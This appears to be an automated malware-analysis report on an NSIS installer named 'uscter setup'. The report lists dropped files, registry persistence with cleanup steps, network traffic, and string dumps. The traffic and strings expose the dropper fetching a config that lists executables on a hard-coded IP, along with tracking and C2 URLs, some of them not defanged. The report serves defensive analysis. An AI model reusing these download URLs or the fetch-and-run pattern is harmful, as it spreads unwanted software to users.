%Documents and Settings%\%current user%\Local Settings\Temp\nsb5.tmp (13218 bytes)
%Documents and Settings%\%current user%\Desktop\hao123ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Program Files%\Favorite\ico\sg1.ico (9 bytes)
%Documents and Settings%\%current user%\Desktop\Internet Explroer.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\360ÃÂÂøÖ·µ¼º½.lnk (1 bytes)
%Documents and Settings%\%current user%\Desktop\°®ÌÃâ€Â±¦.lnk (1 bytes)
%Program Files%\Favorite\ico\movie.ico (12536 bytes)
%Program Files%\Favorite\ico\ie.ico (784 bytes)
%Program Files%\Favorite\ico\23451.ico (9 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\-2203_1_mp.exe (269650 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\CreateShortcut.exe (9276 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\ksimekusu_zhim_007.exe (230865 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\Furt.exe (16944 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\apps.txt (1457 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd2.tmp (20725 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\OneDay.exe (108876 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst3.tmp\NSISdl.dll (14 bytes)
%Program Files%\KS2015011116\V1426\msvcr100.dll (25824 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÃÂÂÎÄÖ®ÃÂÂÇË«Æ´.ini (526 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\wordlib\sys.wlb (39329 bytes)
%Program Files%\KS2015011116\V1426\imeunit.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_main.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\bg_status.png (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ìáʾ.ini (960 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÉèÖÃ.lnk (812 bytes)
%Program Files%\KS2015011116\V1426\atl100.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\nsis.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsi8.tmp (285959 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzjf.dat (784 bytes)
%Program Files%\KS2015011116\V1426\install.exe (1856 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\À¶ÌìË«Æ´.ini (912 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\phrase\ÎҵĶÌÓï.ini (24 bytes)
%Program Files%\KS2015011116\V1426\imeword.exe (4992 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Æ´Òô¼Ó¼ÓË«Æ´.ini (538 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\KillProcDLL.dll (4 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\theme.ini (2 bytes)
%Program Files%\KS2015011116\V1426\msvcp100.dll (14184 bytes)
%Program Files%\KS2015011116\V1426\uninst.exe (838 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeSkin.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\buttons.png (5 bytes)
%Program Files%\KS2015011116\V1426\DirectUI.dll (22192 bytes)
%Program Files%\KS2015011116\V1426\Library.dll (5064 bytes)
%Program Files%\KS2015011116\V1426\sqlite3.dll (22192 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÃÂÂÎÄ·ûºÅ.ini (560 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\¹Ì¶¥Ãâ€â€ÃƒÆ’–.ini (6 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ë«Æ´.ini (1 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeTool.dll (2392 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\j2f.dat (11048 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\ÖÇÄÜABCË«Æ´.ini (686 bytes)
%Program Files%\KS2015011116\V1426\imetool.exe (6360 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\plugin.db (2 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeMini.dll (5064 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\DOSË«Æ´.ini (674 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\ÃÂÂÞ¸´.lnk (825 bytes)
%Program Files%\KS2015011116\V1426\config.exe (11344 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\menu_buttons.bmp (920 bytes)
%Documents and Settings%\%current user%\Application Data\kusuInput\wordlib\user.wlb (3 bytes)
%Program Files%\KS2015011116\V1426\KS1426.exe (7192 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy9.tmp\System.dll (11 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\¿ìËÙÆ´ÒôÊäÈë·¨\öÃâ€ÂØ.lnk (613 bytes)
%System%\ksime.ime (126018 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\΢ÈÃÂÂË«Æ´.ini (682 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\phrase\õó¶ÌÓï¿â.ini (784 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\ini\Ãâ€â€ÃƒÆ’â€ÂÈ»ÂëË«Æ´.ini (580 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\zi\hzpy.dat (18424 bytes)
%Program Files%\KS2015011116\V1426\nsis.dll (3616 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeWord.dll (1552 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\theme\ĬÈÃÂÂÖ÷Ìâ\line.png (143 bytes)
%Documents and Settings%\All Users\Application Data\kusuInput\plugin\ImeUnit.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\FNHI9HC7\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1G36EQJN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\20DNL7ZC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\VBTRRG9A\desktop.ini (67 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"KS1426.exe" = "%Program Files%\KS2015011116\V1426\KS1426.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Static Analysis
VersionInfo
Company Name:
Product Name: uscter
Product Version:
Legal Copyright: ???? (C) 2014
Legal Trademarks:
Original Filename: uscter setup
Internal Name: uscter setup
File Version:
File Description:
Comments:
Language: Chinese (Simplified, PRC)
Company Name: Product Name: uscterProduct Version: Legal Copyright: ???? (C) 2014Legal Trademarks: Original Filename: uscter setupInternal Name: uscter setupFile Version: File Description: Comments: Language: Chinese (Simplified, PRC)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 23488 | 23552 | 4.48909 | 7ebfade271f75cb4c180603ab653af42 |
| .rdata | 28672 | 4496 | 4608 | 3.59139 | 9d6e96915262c9d1129a16fa0b02a19a |
| .data | 36864 | 110456 | 1024 | 3.27356 | dbf10679c897d0edeee280fffdad552f |
| .ndata | 147456 | 40960 | 0 | 0 | d41d8cd98f00b204e9800998ecf8427e |
| .rsrc | 188416 | 34600 | 34816 | 3.26755 | 727c03c4b9eda9d853630881e7a4752c |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://www.google.uscter.hk.moyan.cc/db/apps.txt | 124.232.146.41 |
| hxxp://srftj.xmzs8.com/tongji.php?k=803cd96c0f74b9b3be5d61ee009ac9673b26d0ff0a4142acff7f40d8c5529bf151cc9b398f4910825321ddaf9ec9b80c3beaa32eed80a712eeb06f6b021af12ea3b9765c2819b1affd09c5cf3c47bed4 | 219.129.237.13 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /tongji.php?k=803cd96c0f74b9b3be5d61ee009ac9673b26d0ff0a4142acff7f40d8c5529bf151cc9b398f4910825321ddaf9ec9b80c3beaa32eed80a712eeb06f6b021af12ea3b9765c2819b1affd09c5cf3c47bed4 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: */*
User-Agent: WINNET
Host: srftj.xmzs8.com
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Sun, 11 Jan 2015 14:27:47 GMT
Content-Type: text/html;charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.17p1
2..ok..0..HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Sun, 11 Jan 2015 14:27:47 GMT..Content-Type: text/html;charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..Vary: Accept-Encoding..X-Powered-By: PHP/5.2.17p1..2..ok..0..
GET /db/apps.txt HTTP/1.0
Host: VVV.google.uscter.hk.moyan.cc
User-Agent: NSISDL/1.2 (Mozilla)
Accept: */*
HTTP/1.1 200 OK
Content-Length: 1457
Content-Type: text/plain
Last-Modified: Fri, 09 Jan 2015 13:26:20 GMT
Accept-Ranges: bytes
ETag: "0a6c1daf2cd01:fe4"
Server: IIS
X-Powered-By: WAF/2.0
Date: Sun, 11 Jan 2015 14:27:18 GMT
Connection: close
/*Setting*/..[ff1]..aa=OneDay..bb=OneDay.exe..cc=hXXp://124.232.152.119:18168/db/OneDay.zip..dd=..[ff2]..aa=lnk..bb=CreateShortcut.exe..cc=http://124.232.152.119:18168/db/CreateShortcut.zip..dd=..[ff3]..aa=......bb=ksimekusu_zhim_007.exe..cc=hXXp://124.232.152.119:18168/db/ksimekusu_zhim_007.zip..dd=..[ff5000]..aa=uc..bb=Browser_V4.0.3214.0_r_4067_(Build14122211)_1420477202.exe..cc=hXXp://ly.jyfb.net/air/aicc/check.php?id=259..dd=..[ff11]..aa=mp..bb=-2203_1_mp.exe..cc=hXXp://124.232.152.119:18168/db/-2203_1_mp.zip..dd=..[ff12]..aa=tqrl..bb=tqrl_93_2508.exe..cc=hXXp://124.232.152.119:18168/db/tqrl_93_2508.zip..dd=..[ff13]..aa=......bb=weather_b_90045.exe..cc=hXXp://124.232.152.119:18168/db/weather_b_90045.zip..dd=..[ff14]..aa=aqi..bb=IQIYIsetup_qudao@kb007.exe..cc=hXXp://124.232.152.119:18168/db/IQIYIsetup_qHTTP/1.1 200 OK..Content-Length: 1457..Content-Type: text/plain..Last-Modified: Fri, 09 Jan 2015 13:26:20 GMT..Accept-Ranges: bytes..ETag: "0a6c1daf2cd01:fe4"..Server: IIS..X-Powered-By: WAF/2.0..Date: Sun, 11 Jan 2015 14:27:18 GMT..Connection: close../*Setting*/..[ff1]..aa=OneDay..bb=OneDay.exe..cc=http://124.232.152.119:18168/db/OneDay.zip..dd=..[ff2]..aa=lnk..bb=CreateShortcut.exe..cc=hXXp://124.232.152.119:18168/db/CreateShortcut.zip..dd=..[ff3]..aa=......bb=ksimekusu_zhim_007.exe..cc=hXXp://124.232.152.119:18168/db/ksimekusu_zhim_007.zip..dd=..[ff5000]..aa=uc..bb=Browser_V4.0.3214.0_r_4067_(Build14122211)_1420477202.exe..cc=hXXp://ly.jyfb.net/air/aicc/check.php?id=259..dd=..[ff11]..aa=mp..bb=-2203_1_mp.e
<<< skipped >>>
Map
The Malware connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_772:
.text
.text
`.rdata
`.rdata
@.data
@.data
.ndata
.ndata
.rsrc
.rsrc
uDSSh
uDSSh
.DEFAULT\Control Panel\International
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
GetWindowsDirectoryA
KERNEL32.dll
KERNEL32.dll
ExitWindowsEx
ExitWindowsEx
USER32.dll
USER32.dll
GDI32.dll
GDI32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
RegEnumKeyA
RegEnumKeyA
RegCreateKeyExA
RegCreateKeyExA
RegCloseKey
RegCloseKey
RegDeleteKeyA
RegDeleteKeyA
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
COMCTL32.dll
COMCTL32.dll
ole32.dll
ole32.dll
VERSION.dll
VERSION.dll
verifying installer: %d%%
verifying installer: %d%%
unpacking data: %d%%
unpacking data: %d%%
... %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
~nsu.tmp
%u.%u%s%s
%u.%u%s%s
RegDeleteKeyExA
RegDeleteKeyExA
%s=%s
%s=%s
*?|/":
*?|/":
\LOCALS~1\Temp\nst3.tmp\NSISdl.dll
\LOCALS~1\Temp\nst3.tmp\NSISdl.dll
zhim_007.exe"
zhim_007.exe"
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\NSISdl.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
_mp.zip
_mp.zip
07.zip
07.zip
WS2_32.dll
WS2_32.dll
NSISdl.dll
NSISdl.dll
invalid URL
invalid URL
Host: %s
Host: %s
GET %s HTTP/1.0
GET %s HTTP/1.0
User-Agent: NSISDL/1.2 (Mozilla)
User-Agent: NSISDL/1.2 (Mozilla)
http=
http=
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Unable to open %s
Unable to open %s
%skB (%d%%) of %skB at %u.ukB/s
%skB (%d%%) of %skB at %u.ukB/s
(%u hours remaining)
(%u hours remaining)
(%u minutes remaining)
(%u minutes remaining)
(%u seconds remaining)
(%u seconds remaining)
Downloading %s
Downloading %s
KERNEL32.DLL
KERNEL32.DLL
comdlg32.dll
comdlg32.dll
OLEAUT32.dll
OLEAUT32.dll
oledlg.dll
oledlg.dll
SHLWAPI.dll
SHLWAPI.dll
WININET.dll
WININET.dll
WINSPOOL.DRV
WINSPOOL.DRV
RegEnumKeyW
RegEnumKeyW
.reloc
.reloc
>~..hv
>~..hv
To%s1
To%s1
('.Lu*s
('.Lu*s
%f
%f
apps.txt
apps.txt
_007.exe"
_007.exe"
2014.11.15.134232
2014.11.15.134232
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
c:\%original file name%.exe
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\uscter
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\uscter
%original file name%.exe
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso1.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
-2203_1_mp.exe
-2203_1_mp.exe
007.exe
007.exe
hXXp://124.232.152.119:18168/db/-2203_1_mp.zip
hXXp://124.232.152.119:18168/db/-2203_1_mp.zip
007.zip
007.zip
SR3#_`=*kiB.upG2
SR3#_`=*kiB.upG2
Nullsoft Install System v2.46
Nullsoft Install System v2.46
FFR.D9DD.CN
FFR.D9DD.CN
2.0.0.1
2.0.0.1
FreeFastRecovery.exe
FreeFastRecovery.exe
KS1426.exe_2000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
@.reloc
@.reloc
E:\Calendar2.0.2.0\kssrf\code\build\x86\ksinput.pdb
E:\Calendar2.0.2.0\kssrf\code\build\x86\ksinput.pdb
SHLWAPI.dll
SHLWAPI.dll
ShellExecuteW
ShellExecuteW
SHELL32.dll
SHELL32.dll
KERNEL32.dll
KERNEL32.dll
USER32.dll
USER32.dll
RegOpenKeyExW
RegOpenKeyExW
RegCloseKey
RegCloseKey
RegOpenKeyW
RegOpenKeyW
RegCreateKeyW
RegCreateKeyW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
DeleteUrlCacheEntryW
DeleteUrlCacheEntryW
WININET.dll
WININET.dll
URLDownloadToFileW
URLDownloadToFileW
urlmon.dll
urlmon.dll
MSVCP100.dll
MSVCP100.dll
sqlite3_open
sqlite3_open
sqlite3_close
sqlite3_close
sqlite3_get_table
sqlite3_get_table
sqlite3_free
sqlite3_free
sqlite3_free_table
sqlite3_free_table
sqlite3_exec
sqlite3_exec
sqlite3.dll
sqlite3.dll
Library.dll
Library.dll
?OnKeyDown@WindowImplBase@DUILIB@@UAEJIIJAAH@Z
?OnKeyDown@WindowImplBase@DUILIB@@UAEJIIJAAH@Z
?GetMessageMap@WindowImplBase@DUILIB@@MBEPBUDUI_MSGMAP@2@XZ
?GetMessageMap@WindowImplBase@DUILIB@@MBEPBUDUI_MSGMAP@2@XZ
DirectUI.dll
DirectUI.dll
MSVCR100.dll
MSVCR100.dll
_amsg_exit
_amsg_exit
_wcmdln
_wcmdln
_crt_debugger_hook
_crt_debugger_hook
GetProcessHeap
GetProcessHeap
.?AVTable@SQLite@@
.?AVTable@SQLite@@
.?AVUTF8MBSTR@SQLite@@
.?AVUTF8MBSTR@SQLite@@
.?AVDatabase@SQLite@@
.?AVDatabase@SQLite@@
0#0*00060
0#0*00060
; ;$;(;,;0;4;8;
; ;$;(;,;0;4;8;
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\
%USER%
%USER%
ksinput.exe
ksinput.exe
config %d
config %d
config.exe
config.exe
3.0.3.9*%s*%s*%s*0*1*0*0*0
3.0.3.9*%s*%s*%s*0*1*0*0*0
3.0.3.9*%s*%s*%s*0*0*1*0*0
3.0.3.9*%s*%s*%s*0*0*1*0*0
php.ijgnot/moc.8szmx.jtfrs//:ptth
php.ijgnot/moc.8szmx.jtfrs//:ptth
%s?k=%s
%s?k=%s
select * from plugin where item=%d
select * from plugin where item=%d
n\plugin\plugin.db
n\plugin\plugin.db
CREATE TABLE "plugin" ("item" INTEGER PRIMARY KEY, "vers" INTEGER, "name" VARCHAR, "path" VARCHAR, "file" VARCHAR, "down" VARCHAR)
CREATE TABLE "plugin" ("item" INTEGER PRIMARY KEY, "vers" INTEGER, "name" VARCHAR, "path" VARCHAR, "file" VARCHAR, "down" VARCHAR)
%s%s%d.zip
%s%s%d.zip
update plugin set ver=%d, name='%s', path='%s', file='%s' down='%s' where item=%d
update plugin set ver=%d, name='%s', path='%s', file='%s' down='%s' where item=%d
insert into plugin(item,vers,name,path,file,down) values(%d,%d,'%s','%s','%s','%s')
insert into plugin(item,vers,name,path,file,down) values(%d,%d,'%s','%s','%s','%s')
update plugin set vers=%d, name='%s', path='%s', file='%s', down='%s' where item=%d
update plugin set vers=%d, name='%s', path='%s', file='%s', down='%s' where item=%d
php.gifnoc/moc.8szmx.afuruhs//:ptth
php.gifnoc/moc.8szmx.afuruhs//:ptth
%s?v=3.0.3.9&t=1&x=%s&c=%d
%s?v=3.0.3.9&t=1&x=%s&c=%d
20150111
20150111
3.0.3.9
3.0.3.9